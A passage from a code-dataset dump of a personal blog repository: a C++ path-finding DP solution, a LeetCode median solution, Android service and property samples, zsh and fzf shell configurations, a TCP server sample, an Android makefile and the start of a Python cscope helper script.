(non-negative integer numbers not exceeding 109).\n *\n * Output\n * In the first line print the least number of trailing zeros. In the second line print the correspondent way itself.\n *\n * Sample test(s)\n * input\n * 3\n * 1 2 3\n * 4 5 6\n * 7 8 9\n * output\n * 0\n * DDRR\n *\n *\n * Note: take care of the special case that there is 0 in the matrix.\n *\n */\n\n#include <iostream>\n\nusing namespace std;\nconst int MAX_SIZE = 1024;\n\nint gm[MAX_SIZE][MAX_SIZE], gm2[MAX_SIZE][MAX_SIZE], gm5[MAX_SIZE][MAX_SIZE];\nchar gd2[MAX_SIZE][MAX_SIZE], gd5[MAX_SIZE][MAX_SIZE];\nint zero_flag, zero_row, zero_col;\n\ntemplate<typename T>\nvoid print_matrix(T **m, int n) {\n for (int i = 0; i < n; ++i) {\n for (int j = 0; j < n; ++j) {\n cout << m[i][j] << ' ';\n }\n cout << endl;\n }\n}\n\nvoid get_number_of_factor(int **m, int **mo, int n, int p) {\n for (int i = 0; i < n; ++i) {\n for (int j = 0; j < n; ++j) {\n int x = m[i][j];\n if(zero_flag == 0 && x == 0) {\n zero_flag = 1;\n zero_row = i;\n zero_col = j;\n }\n while(x!=0 && x%p==0) {\n ++mo[i][j];\n x/=p;\n }\n }\n }\n}\n\nvoid dp(int **m, char **d, int n) {\n d[0][0] = ' ';\n for (int i = 1; i < n; ++i) {\n m[0][i] += m[0][i-1];\n m[i][0] += m[i-1][0];\n d[0][i] = 'R';\n d[i][0] = 'D';\n }\n\n for (int i = 1; i < n; ++i) {\n for (int j = 1; j < n; ++j) {\n if(m[i-1][j] >= m[i][j-1]) {\n m[i][j] += m[i][j-1];\n d[i][j] = 'R';\n }\n else {\n m[i][j] += m[i-1][j];\n d[i][j] = 'D';\n }\n }\n }\n}\n\nvoid output_path(char** d, int n) {\n int path_len = 2*(n-1)+1;\n char *path = new char[path_len];\n path[path_len-1] = '\\0';\n int i = n-1, j = n-1, k = path_len-2;\n while(k != -1) {\n path[k]=d[i][j];\n //cout << path_len << ' ' << i << ' ' << j << ' ' << k << ' ' << path[k] << endl;\n --k;\n if(d[i][j] == 'D')\n --i;\n else\n --j;\n }\n cout << path << endl;\n delete[] path;\n}\n\nint main(int argc, const char *argv[]) {\n int n = 0;\n int **m, **m2, **m5;\n char **d2, **d5;\n m = (int**)gm;\n m2 = (int**)gm2;\n m5 = (int**)gm5;\n d2 = (char**)gd2;\n d5 = (char**)gd5;\n cin >> n;\n m = new int*[n];\n m2 = new int*[n];\n m5 = new int*[n];\n d2 = new char*[n];\n d5 = new char*[n];\n for (int i = 0; i < n; ++i) {\n m[i] = new int[n];\n for (int j = 0; j < n; ++j) {\n cin >> m[i][j];\n }\n m2[i] = new int[n];\n m5[i] = new int[n];\n for (int j = 0; j < n; ++j) {\n m2[i][j] = 0;\n m5[i][j] = 0;\n }\n d2[i] = new char[n];\n d5[i] = new char[n];\n }\n\n get_number_of_factor(m, m2, n, 2);\n get_number_of_factor(m, m5, n, 5);\n\n dp(m2, d2, n);\n dp(m5, d5, n);\n\n int count2 = m2[n-1][n-1], count5 = m5[n-1][n-1];\n if(count2 < 1 || count5 < 1 || zero_flag == 0) {\n if(count2 > count5) {\n cout << count5 << endl;\n output_path(d5, n);\n }\n else {\n cout << count2 << endl;\n output_path(d2, n);\n }\n }\n else { // the path that contains 0 is the least one\n cout << 1 << endl;\n for(int i = 0; i < zero_row; ++i)\n cout << 'D';\n for(int i = 0; i < n-1; ++i)\n cout << 'R';\n for(int i = zero_row; i < n-1; ++i)\n cout << 'D';\n cout << endl;\n }\n\n return 0;\n}\n" }, { "alpha_fraction": 0.42717087268829346, "alphanum_fraction": 0.450280100107193, "avg_line_length": 28.75, "blob_id": "7f90d7dd039ac2238447c0b97612c516578d7e12", "content_id": "20a7e90d54452ad11e9a312250f12b78d3898ea5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1428, "license_type": "permissive", "max_line_length": 166, "num_lines": 48, "path": "/algorithm/leetcode/4_median_of_two_sorted_arrays.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "/*\n *\n * http://leetcode.com/onlinejudge#question_4\n *\n * Median of Two Sorted ArraysMar 28 '112995 / 15696\n *\n * There are two sorted arrays A and B of size m and n respectively. Find the median of the two sorted arrays. The overall run time complexity should be O(log (m+n)).\n *\n */\n\n#include <iostream>\n\nusing namespace std;\n\nclass Solution {\n private:\n int findKthElement(int A[], int m, int B[], int n, int k) {\n int i = 0, j = 0, index = 0, result = 0;\n while(index++ < k) {\n cout << i << ' ' << j << ' ' << k << ' ' << index << endl;\n if(j >= n || (i < m && A[i] <= B[j])) {\n result = A[i++]; \n continue;\n }\n if(i >= m || (j < n && A[i] > B[j])) {\n result = B[j++];\n continue;\n }\n }\n return result;\n }\n\n public:\n double findMedianSortedArrays(int A[], int m, int B[], int n) {\n double ans = findKthElement(A, m, B, n, (m+n+1)/2);\n if((m+n)%2 == 0)\n ans = (ans+findKthElement(A, m, B, n, (m+n+2)/2))/2;\n return ans;\n }\n};\n\nint main(int argc, const char *argv[]) {\n int A[] = {};\n int B[] = {1, 4, 5, 6, 7};\n Solution s;\n cout << s.findMedianSortedArrays(A, sizeof(A)/sizeof(A[0]), B, sizeof(B)/sizeof(B[0])) << endl;\n return 0;\n}\n" }, { "alpha_fraction": 0.6300885081291199, "alphanum_fraction": 0.641887903213501, "avg_line_length": 21.873239517211914, "blob_id": "918b11c9e75db5f97f0f4ef879c854fb40f9b9c5", "content_id": "ac817c92c5ead120f3c6eb40935e81a03c8dac32", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1695, "license_type": "permissive", "max_line_length": 99, "num_lines": 71, "path": "/android/rpc-with-service/app2/src/com/rmd/app2/App2Service.java", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "package com.rmd.app2;\r\n\r\nimport android.app.Service;\r\nimport android.content.Intent;\r\nimport android.os.IBinder;\r\nimport android.os.RemoteException;\r\nimport android.util.Log;\r\n\r\nimport com.rmd.ISvcController;\r\n\r\npublic class App2Service extends Service {\r\n\r\n\tIBinder svcController = null;\r\n\t\r\n\t@Override\r\n\tpublic IBinder onBind(Intent intent) {\r\n\t\tLog.v(\"App2\", \"App2 service onBind.\");\r\n\t\tif(null == svcController)\r\n\t\t{\r\n\t\t\tsvcController = new ISvcController.Stub() {\r\n\t\t\t\t\r\n\t\t\t\t@Override\r\n\t\t\t\tpublic void foo(String arg) throws RemoteException {\r\n\t\t\t\t\tLog.v(\"App2Service\", \"foo fired with argument: \" + arg);\r\n\t\t\t\t}\r\n\t\t\t\t\r\n\t\t\t\t@Override\r\n\t\t\t\tpublic void bar(String arg) throws RemoteException {\r\n\t\t\t\t\tLog.v(\"App2Service\", \"bar fired with argument: \" + arg);\r\n\t\t\t\t}\r\n\r\n\t\t\t\t@Override\r\n\t\t\t\tpublic void func(int arg, String str) throws RemoteException {\r\n\t\t\t\t\tLog.v(\"App2Service\", \"func fired with argument: \" + str);\r\n\t\t\t\t}\r\n\t\t\t};\r\n\t\t}\r\n\t\tLog.v(\"App2\", \"App2 service onBind.\");\r\n\t\tLog.v(\"App2\", svcController.getClass().toString() + \"\\t hash code: \" + svcController.hashCode());\r\n\t\treturn svcController;\r\n\t}\r\n\r\n\tpublic void onCreate() {\r\n\t\tsuper.onCreate();\r\n\t\tLog.v(\"App2\", \"App2 service create.\");\r\n\t}\r\n\t@Override\r\n\tpublic void onDestroy() {\r\n\t\tsuper.onDestroy();\r\n\t\tLog.v(\"App2\", \"App2 service destroy.\");\r\n\t}\r\n\t\r\n\tpublic void onStart(Intent intent, int startId) {\r\n\t\t\r\n\t\tLog.v(\"App2\", \"App2 service start.\");\r\n\t};\r\n\t\r\n\t@Override\r\n\tpublic boolean onUnbind(Intent intent) {\r\n\t\tLog.v(\"App2\", \"App2 service onUnbind.\");\r\n\t\r\n\t\treturn super.onUnbind(intent);\r\n\t}\r\n\t\r\n\t@Override\r\n\tpublic void onRebind(Intent intent) {\r\n\t\tLog.v(\"App2\", \"App2 service rebind.\");\r\n\t\r\n\t\tsuper.onRebind(intent);\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.35041549801826477, "alphanum_fraction": 0.3739612102508545, "avg_line_length": 25.740739822387695, "blob_id": "d34faac89c29fadb9dc3a09c9bdbd012b5485ede", "content_id": "d16d905102f7cb3b05a57edd3f1167c93315835d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 722, "license_type": "permissive", "max_line_length": 88, "num_lines": 27, "path": "/android/native_read_property/jni/readproperty.c", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// =====================================================================================\n// \n// Filename: rmd.c\n// \n// Description: \n// \n// Version: 1.0\n// Created: 12/21/2010 08:55:57 PM\n// Revision: none\n// Compiler: g++\n// \n// Author: Raymond Wen (), \n// Company: \n// \n// =====================================================================================\n\n\n#include\t<sys/system_properties.h>\n\nint main ( int argc, char *argv[] )\n{\n char value[PROP_VALUE_MAX];\n const char* name = \"media.stagefright.enable-http\";\n __system_property_get(name, value);\n printf(\"%s: %s\\n\", name, value);\n return 0;\n}\t\t\t\t// ---------- end of function main ----------\n" }, { "alpha_fraction": 0.7240875959396362, "alphanum_fraction": 0.7262773513793945, "avg_line_length": 36.013511657714844, "blob_id": "914ea635dd965445c44ac3f8b10d0d6eb4ebc404", "content_id": "58e4734070cd8560c56be76207be61db5c9abccd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2740, "license_type": "permissive", "max_line_length": 167, "num_lines": 74, "path": "/settings/ubuntu_home/.zshrc", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "# Path to your oh-my-zsh configuration.\nZSH=$HOME/.oh-my-zsh\n\n# Set name of the theme to load.\n# Look in ~/.oh-my-zsh/themes/\n# Optionally, if you set this to \"random\", it'll load a random theme each\n# time that oh-my-zsh is loaded.\nZSH_THEME=\"gentoo\"\n\n# Example aliases\n# alias zshconfig=\"mate ~/.zshrc\"\n# alias ohmyzsh=\"mate ~/.oh-my-zsh\"\n\n# Set to this to use case-sensitive completion\n# CASE_SENSITIVE=\"true\"\n\n# Uncomment this to disable bi-weekly auto-update checks\nDISABLE_AUTO_UPDATE=\"true\"\n\n# Uncomment to change how often before auto-updates occur? (in days)\n# export UPDATE_ZSH_DAYS=13\n\n# Uncomment following line if you want to disable colors in ls\n# DISABLE_LS_COLORS=\"true\"\n\n# Uncomment following line if you want to disable autosetting terminal title.\n# DISABLE_AUTO_TITLE=\"true\"\n\n# Uncomment following line if you want to disable command autocorrection\n# DISABLE_CORRECTION=\"true\"\n\n# Uncomment following line if you want red dots to be displayed while waiting for completion\n# COMPLETION_WAITING_DOTS=\"true\"\n\n# Uncomment following line if you want to disable marking untracked files under\n# VCS as dirty. This makes repository status check for large repositories much,\n# much faster.\n# DISABLE_UNTRACKED_FILES_DIRTY=\"true\"\n\n# config Ctrl+U to delete from cursor to the beginning of line, to mimic bash behavior\nbindkey \\^u backward-kill-line\n\n# configuration for zsh-completions\nfpath=(~/.oh-my-zsh/custom/plugins/zsh-completions/src/ $fpath)\n\n# Which plugins would you like to load? (plugins can be found in ~/.oh-my-zsh/plugins/*)\n# Custom plugins may be added to ~/.oh-my-zsh/custom/plugins/\n# Example format: plugins=(rails git textmate ruby lighthouse)\nplugins=(git fasd tmux zsh-syntax-highlighting golang repo docker pip git-extras colored-man kubectl)\nexport ZSH_TMUX_AUTOSTART=true\nexport ZSH_TMUX_AUTOSTART_ONCE=true\nexport ZSH_TMUX_AUTOCONNECT=false\nexport ZSH_TMUX_AUTOQUIT=false\n\nsource $ZSH/oh-my-zsh.sh\n\n# Customize to your needs...\n#PROMPT='%(!.%{$fg_bold[red]%}.%{$fg_bold[green]%}%n@)%m%{$fg_bold[blue]%}:%1d $(git_prompt_info)%_$(prompt_char)%{$reset_color%} '\nPROMPT='%(!.%{$fg_bold[red]%}.%{$fg_bold[green]%}%n@)%m%{$fg_bold[blue]%}:%1d %{$fg_bold[magenta]%}$(git_prompt_info)%{$fg_bold[blue]%}$(prompt_char)%{$reset_color%} '\nif [ -f ~/.bash_aliases ]; then\n source ~/.bash_aliases\nfi\n\n# my own git_prompt_info function that does parse git directory status\nfunction git_prompt_info() {\n ref=$(command git symbolic-ref HEAD 2> /dev/null) || \\\n ref=$(command git rev-parse --short HEAD 2> /dev/null) || return\n echo \"$ZSH_THEME_GIT_PROMPT_PREFIX${ref#refs/heads/}$ZSH_THEME_GIT_PROMPT_SUFFIX\"\n}\n\n# setup machine specific environment variables sotred in .env\nif [ -f ~/.env ] ; then\n . ~/.env\nfi\n\n" }, { "alpha_fraction": 0.5948616862297058, "alphanum_fraction": 0.6027668118476868, "avg_line_length": 19.08333396911621, "blob_id": "fe2ca23e30b6073e4458318e205b477beeee9589", "content_id": "cacbb02b500e24cdd496e79a7441042e58c2c984", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 506, "license_type": "permissive", "max_line_length": 65, "num_lines": 24, "path": "/wince/protobuf_for_ce/ce_port/errno.h", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "/***\r\n*errno.h - system wide error numbers (set by system calls)\r\n*\r\n* Copyright (c) Microsoft Corporation. All rights reserved.\r\n*\r\n*Purpose:\r\n* This file defines the system-wide error numbers (set by\r\n* system calls). Conforms to the XENIX standard. Extended\r\n* for compatibility with Uniforum standard.\r\n* [System V]\r\n*\r\n* [Public] \r\n*\r\n****/\r\n\r\n#if _MSC_VER > 1000\r\n#pragma once\r\n#endif\r\n\r\n#ifndef _INC_ERRNO\r\n#define _INC_ERRNO\r\n\r\n\r\n#endif /* _INC_ERRNO */\r\n" }, { "alpha_fraction": 0.4329608976840973, "alphanum_fraction": 0.455307275056839, "avg_line_length": 22.09677505493164, "blob_id": "9fdfa144bb73b8f884ff9a79632c5f8f1a6e62b7", "content_id": "65781fa68a07189dc4ecc2d8e36290ade9ce5428", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1432, "license_type": "permissive", "max_line_length": 88, "num_lines": 62, "path": "/networking/simplest_tcp_server_on_new_thread.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// =====================================================================================\n// \n// Filename: simplest_tcp_server_on_new_thread.cpp\n// \n// Description: \n// \n// Version: 1.0\n// Created: 10/27/2010 09:39:56 AM\n// Revision: none\n// Compiler: g++\n// \n// Author: Raymond Wen (), \n// Company: \n// \n// =====================================================================================\n\n\n#include\t<string.h>\n#include\t<iostream>\n#include\t<netinet/in.h>\n#include\t<sys/socket.h>\n#include\t<pthread.h>\n\nusing namespace std;\n\nstatic void* proc(void* para)\n{\n int sock = *((int*)para);\n if(0 > listen(sock, 1000))\n cout << \"error listen\" << endl;\n while(1)\n {\n accept(sock, NULL, NULL);\n cout << \"accept \" << endl;\n }\n return NULL;\n}\t\t// ----- end of function proc -----\n\nint main ( int argc, char *argv[] )\n{\n int sock = socket(PF_INET, SOCK_STREAM, 0);\n struct sockaddr_in addr;\n\n memset(&addr, 0, sizeof(addr));\n addr.sin_family = AF_INET;\n addr.sin_addr.s_addr = htonl(INADDR_ANY);\n addr.sin_port = htons(8989);\n\n if(0 > bind(sock, (struct sockaddr*)&addr, sizeof(addr)))\n {\n cout << \"error bind\" << endl;\n return 1;\n }\n pthread_t th;\n pthread_create(&th, NULL, proc, &sock);\n while(1)\n {\n continue;\n }\n\n return 0;\n}\t\t\t\t// ---------- end of function main ----------\n" }, { "alpha_fraction": 0.5275074243545532, "alphanum_fraction": 0.5359712243080139, "avg_line_length": 29.882352828979492, "blob_id": "041af03d66ca7a47983af803b831362d7e859ec2", "content_id": "23aa417dd97f9420a14084c4649f6f56dc6f1837", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4726, "license_type": "permissive", "max_line_length": 89, "num_lines": 153, "path": "/settings/ubuntu_home/.fzf.zsh", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "# Setup fzf\n# ---------\nif [[ ! \"$PATH\" == *$HOME/.fzf/bin* ]]; then\n export PATH=\"$PATH:$HOME/.fzf/bin\"\nfi\n\n# Man path\n# --------\nif [[ ! \"$MANPATH\" == *$HOME/.fzf/man* && -d \"$HOME/.fzf/man\" ]]; then\n export MANPATH=\"$MANPATH:$HOME/.fzf/man\"\nfi\n\n# Auto-completion\n# ---------------\n[[ $- == *i* ]] && source \"$HOME/.fzf/shell/completion.zsh\" 2> /dev/null\n\n# Key bindings\n# ------------\nsource \"$HOME/.fzf/shell/key-bindings.zsh\"\n\n\n# fgit-log - git commit browser (enter for show, ctrl-d for diff)\nfgit-log() {\n local out shas sha q k\n while out=$(\n git log --graph --color=always \\\n --format=\"%C(auto)%h%d %s %C(black)%C(bold)%cr\" \"$@\" |\n fzf --ansi --multi --no-sort --reverse --query=\"$q\" \\\n --print-query --expect=ctrl-d); do\n q=$(head -1 <<< \"$out\")\n k=$(head -2 <<< \"$out\" | tail -1)\n shas=$(sed '1,2d;s/^[^a-z0-9]*//;/^$/d' <<< \"$out\" | awk '{print $1}')\n [ -z \"$shas\" ] && continue\n if [ \"$k\" = ctrl-d ]; then\n git diff --color=always $shas | less -R\n else\n for sha in $shas; do\n git show --color=always $sha | less -R\n done\n fi\n done\n}\n\n# fgit-reflog - checkout git reflog\nfgit-reflog() {\n local reflogs sha\n reflogs=$(git reflog) &&\n sha=$(echo \"$reflogs\" | fzf +s +m -e --reverse ) &&\n git checkout $(echo \"$sha\" | sed \"s/ .*//\")\n}\n\n# fgit-branch - checkout git branch (including remote branches)\nfgit-branch() {\n local branches branch\n branches=$(git branch --all | grep -v HEAD) &&\n branch=$(echo \"$branches\" |\n fzf --reverse -d $(( 2 + $(wc -l <<< \"$branches\") )) +m) &&\n git checkout $(echo \"$branch\" | sed \"s/.* //\" | sed \"s#remotes/[^/]*/##\")\n}\n\n# fgit-switch - checkout git\nfgit-tag() {\n local tags target\n tags=$(\n git tag | awk '{print \"\\x1b[31;1mtag\\x1b[m\\t\" $1}') || return\n target=$(\n (echo \"$tags\"; echo \"$branches\") |\n fzf --reverse --no-hscroll --ansi +m -d \"\\t\" -n 2) || return\n git checkout $(echo \"$target\" | awk '{print $2}')\n}\n\n# fgit-show - git commit browser\nfgit-show() {\n git log --graph --color=always \\\n --format=\"%C(auto)%h%d %s %C(black)%C(bold)%cr\" \"$@\" |\n fzf --ansi --no-sort --reverse --tiebreak=index --bind=ctrl-s:toggle-sort \\\n --bind \"ctrl-m:execute:\n (grep -o '[a-f0-9]\\{7\\}' | head -1 |\n xargs -I % sh -c 'git show --color=always % | less -R') << 'FZF-EOF'\n {}\n FZF-EOF\"\n}\n\n# fgit-stash - easier way to deal with stashes\n# type fstash to get a list of your stashes\n# enter shows you the contents of the stash\n# ctrl-d shows a diff of the stash against your current HEAD\n# ctrl-b checks the stash out as a branch, for easier merging\nfgit-stash() {\n local out q k sha\n while out=$(\n git stash list --pretty=\"%C(yellow)%h %>(14)%Cgreen%cr %C(blue)%gs\" |\n fzf --ansi --reverse --no-sort --query=\"$q\" --print-query \\\n --expect=ctrl-d,ctrl-b);\n do\n mapfile -t out <<< \"$out\"\n q=\"${out[0]}\"\n k=\"${out[1]}\"\n sha=\"${out[-1]}\"\n sha=\"${sha%% *}\"\n [[ -z \"$sha\" ]] && continue\n if [[ \"$k\" == 'ctrl-d' ]]; then\n git diff $sha\n elif [[ \"$k\" == 'ctrl-b' ]]; then\n git stash branch \"stash-$sha\" $sha\n break;\n else\n git stash show -p $sha\n fi\n done\n}\n\n# Modified version where you can press\n# - CTRL-O to open with `open` command,\n# - CTRL-E or Enter key to open with the $EDITOR\nfo() {\n local out file key\n out=$(fzf --query=\"$1\" --exit-0 --expect=ctrl-o,ctrl-e)\n key=$(head -1 <<< \"$out\")\n file=$(head -2 <<< \"$out\" | tail -1)\n if [ -n \"$file\" ]; then\n [ \"$key\" = ctrl-o ] && open \"$file\" || ${EDITOR:-vim} \"$file\"\n fi\n}\n\n# fs [FUZZY PATTERN] - Select selected tmux session\n# - Bypass fuzzy finder if there's only one match (--select-1)\n# - Exit if there's no match (--exit-0)\nfs() {\n local session\n session=$(tmux list-sessions -F \"#{session_name}\" | \\\n fzf --query=\"$1\" --select-1 --exit-0) &&\n tmux switch-client -t \"$session\"\n}\n\n# ftpane - switch pane\nftpane () {\n local panes current_window target target_window target_pane\n panes=$(tmux list-panes -s -F '#I:#P - #{pane_current_path} #{pane_current_command}')\n current_window=$(tmux display-message -p '#I')\n\n target=$(echo \"$panes\" | fzf-tmux) || return\n\n target_window=$(echo $target | awk 'BEGIN{FS=\":|-\"} {print$1}')\n target_pane=$(echo $target | awk 'BEGIN{FS=\":|-\"} {print$2}' | cut -c 1)\n\n if [[ $current_window -eq $target_window ]]; then\n tmux select-pane -t ${target_window}.${target_pane}\n else\n tmux select-pane -t ${target_window}.${target_pane} &&\n tmux select-window -t $target_window\n fi\n}\n\n" }, { "alpha_fraction": 0.6883935928344727, "alphanum_fraction": 0.7123633027076721, "avg_line_length": 29.10126495361328, "blob_id": "716306ac8c111634bce29cafdfdfe93c0d86bbc2", "content_id": "f3c76e86ab4cb3d877ceb1696a7100743d176459", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 2378, "license_type": "permissive", "max_line_length": 59, "num_lines": 79, "path": "/android/exosip_sample/libosip/Android.mk", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "LOCAL_PATH:= $(call my-dir)\ninclude $(CLEAR_VARS)\n\nLOCAL_SRC_FILES:= \\\n\t\tsrc/osipparser2/osip_accept.c \\\n\t\tsrc/osipparser2/osip_proxy_authenticate.c \\\n\t\tsrc/osipparser2/osip_parser_cfg.c \\\n\t\tsrc/osipparser2/osip_mime_version.c \\\n\t\tsrc/osipparser2/osip_uri.c \\\n\t\tsrc/osipparser2/osip_call_id.c \\\n\t\tsrc/osipparser2/osip_contact.c \\\n\t\tsrc/osipparser2/osip_header.c \\\n\t\tsrc/osipparser2/osip_list.c \\\n\t\tsrc/osipparser2/osip_authentication_info.c \\\n\t\tsrc/osipparser2/osip_cseq.c \\\n\t\tsrc/osipparser2/osip_message.c \\\n\t\tsrc/osipparser2/osip_record_route.c \\\n\t\tsrc/osipparser2/osip_authorization.c \\\n\t\tsrc/osipparser2/sdp_accessor.c \\\n\t\tsrc/osipparser2/osip_accept_language.c \\\n\t\tsrc/osipparser2/osip_via.c \\\n\t\tsrc/osipparser2/osip_allow.c \\\n\t\tsrc/osipparser2/osip_call_info.c \\\n\t\tsrc/osipparser2/osip_proxy_authentication_info.c \\\n\t\tsrc/osipparser2/osip_proxy_authorization.c \\\n\t\tsrc/osipparser2/sdp_message.c \\\n\t\tsrc/osipparser2/osip_accept_encoding.c \\\n\t\tsrc/osipparser2/osip_content_encoding.c \\\n\t\tsrc/osipparser2/osip_to.c \\\n\t\tsrc/osipparser2/osip_content_disposition.c \\\n\t\tsrc/osipparser2/osip_message_to_str.c \\\n\t\tsrc/osipparser2/osip_www_authenticate.c \\\n\t\tsrc/osipparser2/osip_error_info.c \\\n\t\tsrc/osipparser2/osip_body.c \\\n\t\tsrc/osipparser2/osip_content_length.c \\\n\t\tsrc/osipparser2/osip_from.c \\\n\t\tsrc/osipparser2/osip_alert_info.c \\\n\t\tsrc/osipparser2/osip_message_parse.c \\\n\t\tsrc/osipparser2/osip_content_type.c \\\n\t\tsrc/osipparser2/osip_port.c \\\n\t\tsrc/osipparser2/osip_md5c.c \\\n\t\tsrc/osipparser2/osip_route.c \\\n\t\tsrc/osip2/osip_transaction.c \\\n\t\tsrc/osip2/osip_dialog.c \\\n\t\tsrc/osip2/osip_event.c \\\n\t\tsrc/osip2/nict_fsm.c \\\n\t\tsrc/osip2/port_thread.c \\\n\t\tsrc/osip2/nict.c \\\n\t\tsrc/osip2/nist.c \\\n\t\tsrc/osip2/port_sema.c \\\n\t\tsrc/osip2/ict_fsm.c \\\n\t\tsrc/osip2/ict.c \\\n\t\tsrc/osip2/port_fifo.c \\\n\t\tsrc/osip2/ist_fsm.c \\\n\t\tsrc/osip2/ist.c \\\n\t\tsrc/osip2/osip_time.c \\\n\t\tsrc/osip2/port_condv.c \\\n\t\tsrc/osip2/fsm_misc.c \\\n\t\tsrc/osip2/osip.c \\\n\t\tsrc/osip2/nist_fsm.c\n\nLOCAL_CFLAGS += -DHAVE_FCNTL_H \\\n\t\t\t\t-DHAVE_SYS_TIME_H \\\n\t\t\t\t-DHAVE_STRUCT_TIMEVAL \\\n\t\t\t\t-DHAVE_SYS_SELECT_H \\\n\t\t\t\t-DHAVE_PTHREAD \\\n\t\t\t\t-DHAVE_SEMAPHORE_H \\\n\t\t\t\t-DENABLE_TRACE \\\n\t\t\t\t-DOSIP_MT\n\nLOCAL_C_INCLUDES:= $(LOCAL_PATH)/include $(LOCAL_PATH)/src \nLOCAL_EXPORT_C_INCLUDES:=$(LOCAL_C_INCLUDES)\n\nLOCAL_PRELINK_MODULE := false\n#LOCAL_LDLIBS += -lpthread -ldl\n\nLOCAL_MODULE:= libosip\n\ninclude $(BUILD_SHARED_LIBRARY)\n" }, { "alpha_fraction": 0.6076905727386475, "alphanum_fraction": 0.6100244522094727, "avg_line_length": 38.98666763305664, "blob_id": "bcc5d7f7bc9e18a6fdd940b0c71b820f61e4ddcf", "content_id": "d532b407a626873874886bf0ee94e9bdb476025a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8998, "license_type": "permissive", "max_line_length": 102, "num_lines": 225, "path": "/tools/bcscope.py", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__VERSION__ = '1.4.1'\n__author__ = '[email protected]'\n\nimport subprocess\nimport sys\nimport shutil\nimport os\nfrom optparse import OptionParser\n\nfile_list_name = \"cscope.files\"\ndefault_database_name = \"cscope.out\"\ndefault_database_name_in = \"cscope.in.out\"\ndefault_database_name_po = \"cscope.po.out\"\ndefault_cfg_name = \".bcscope.cfg\"\n\n# parse command line options\nopt_parser = OptionParser(version = \"%prog \" + __VERSION__, \n description = \"command line tool for generating cscope database\",\n usage = \"%prog [-o file] [file type: c++(default)/c#/python/java/ruby]\")\nopt_parser.add_option(\"-o\", \"--output\", dest=\"output_file\", default=default_database_name, \n help=\"cscope database file\")\nopt_parser.add_option(\"-i\", \"--input\", dest=\"input_file\", default=default_cfg_name, \n help=\"cfg file lists all directories to be included or exclued from search\")\nopt_parser.add_option(\"-r\", \"--recursive\", action=\"store_true\", default=False, \n help=\"recursivly include input_file contained in all directories [default: %default]\")\nopt_parser.add_option(\"-v\", \"--verbose\", action=\"store_true\", default=False, \n help=\"verbose output [default: %default]\")\nopt_parser.add_option(\"-a\", \"--absolute\", action=\"store_true\", default=False, \n help=\"generate cscope database with absolute path [default: %default]\")\nopt_parser.add_option(\"-k\", \"--kernel\", action=\"store_true\", default=False, \n help=\"Kernel Mode - don't use /usr/include for #include files. [default: %default]\")\nopt_parser.add_option(\"-q\", \"--quick\", action=\"store_true\", default=False, \n help=\"Build an inverted index for quick symbol searching. [default: %default]\")\nopt_parser.add_option(\"-c\", \"--confirm\", action=\"store_false\", default=True, \n help=\"confirm overwrite existing cscope database without interaction [default: %default]\")\nopt_parser.add_option(\"-p\", \"--preserve-filelist\", action=\"store_true\", default=False, \n help=\"don't delete cscope.files after the database has been generated [default: %default]\")\nopt_parser.add_option(\"\", \"--include-dir\", default=None, action=\"append\",\n help=\"additional directories to be included in search, can be specified multiple times\")\nopt_parser.add_option(\"\", \"--exclude-dir\", default=None, action=\"append\",\n help=\"additional directories to be exclued from search, can be specified multiple times\")\nopt_parser.add_option(\"\", \"--exclude\", default=None, action=\"append\",\n help=\"file pattern (regular expression) to be excluded, can be specified multiple times\")\nopt_parser.add_option(\"-t\", \"--ctags\", action=\"store_true\", default=False, \n help=\"generate ctags database as well [default: %default]\")\nopt_parser.add_option(\"-g\", \"--gtags\", action=\"store_true\", default=False, \n help=\"generate gtags database as well [default: %default]\")\n(cmdline_options, args) = opt_parser.parse_args()\n\n# config application behavior\nvalid_lan_types = {\"c++\": \"cpp\\|c\\|cxx\\|cc\\|h\\|hpp\\|hxx\",\n \"java\": \"java\",\n \"c#\": \"cs\",\n \"python\": \"py\",\n \"ruby\": \"rb\",\n \"js\": \"js\"}\nlan_type = ''\nif len(args) == 0:\n# no language specified, default to c++\n args = ['c++']\n\nlan_pattern = ''\nfor arg in args:\n lan_type += arg + ' '\n if valid_lan_types.has_key(arg):\n if len(lan_pattern) > 0:\n lan_pattern += '\\|'\n lan_pattern += valid_lan_types[arg]\n else:\n print \"invalid language type: \" + arg \n print \"must be one of:\"\n for (k, v) in valid_lan_types.items():\n print \"\\t\" + k\n sys.exit(-1)\nlan_pattern = '.+\\.\\(' + lan_pattern + '\\)$'\n\n# take care of accidently overwrite existing database file\nif not cmdline_options.confirm:\n confirm = 'n'\n if default_database_name != cmdline_options.output_file and os.path.isfile(default_database_name):\n confirm = raw_input(default_database_name + \" already exists, overwrite it? (y/n)\")\n if confirm != \"y\":\n sys.exit(0)\n if os.path.isfile(cmdline_options.output_file):\n confirm = raw_input(cmdline_options.output_file + \" already exists, overwrite it? (y/n)\")\n if confirm != 